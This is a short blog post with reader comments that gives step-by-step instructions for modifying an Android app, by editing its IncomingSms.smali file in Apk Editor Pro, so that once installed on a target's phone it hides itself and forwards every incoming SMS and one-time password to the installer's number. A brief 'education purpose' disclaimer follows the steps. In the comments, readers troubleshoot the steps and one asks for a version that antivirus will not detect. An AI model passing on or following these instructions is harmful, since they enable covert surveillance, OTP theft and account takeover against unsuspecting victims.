How To Forward SMS Any Mobile Number 2020 ||

Hii Guys welcome you my new post in this post i will show you,how you can forward any OTP and SMS any number for free app so let`s start

1.first of all you have to download the application which i have modified 

2.ok now after downloading you do not have to open it you have to modify it for that you use Apk Editor Pro then you have to select this app you have to find a file for incomingsms.smali so click on the smali folder then choose this path 

smail,com,ApkEditors,HackingTelegram, you have to open the IncomingSms.smali file and you have to edit something in it 

5.ok guys after opening the file and you have to find 258 line and here you see Linuxndroid by deleting it and you have to enter your number with your country code in which number you want to forward OTP and SMS you have to save it after that Build the application then click on install button you have to open the application and wait 5sec..and you can see then it automaticlly hide from your target mobile any SMS and OTP  will come on the targets number they will be forwarded to your number 


ok guys today`s post i will show you how you can forward otp and sms of any number to your number but guys dont use illegal activites this is only education purpose ok so i hope you like this post so see you in the next post Thanks Love you all 💓

Application Download Link 👇👇

YouTube Video [ Hindi ] 👇

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  1. Bro smali option is not showing what to do

  2. Smali folder nii arhaaa brother ....

  3. Smali folder nii arhaaa brother...

  4. No funciona amigo podías crear una para ver los msm de texto de otro celu?

  5. Bhai antivirus dected kartha mi phone par hai plz make undectable app agin


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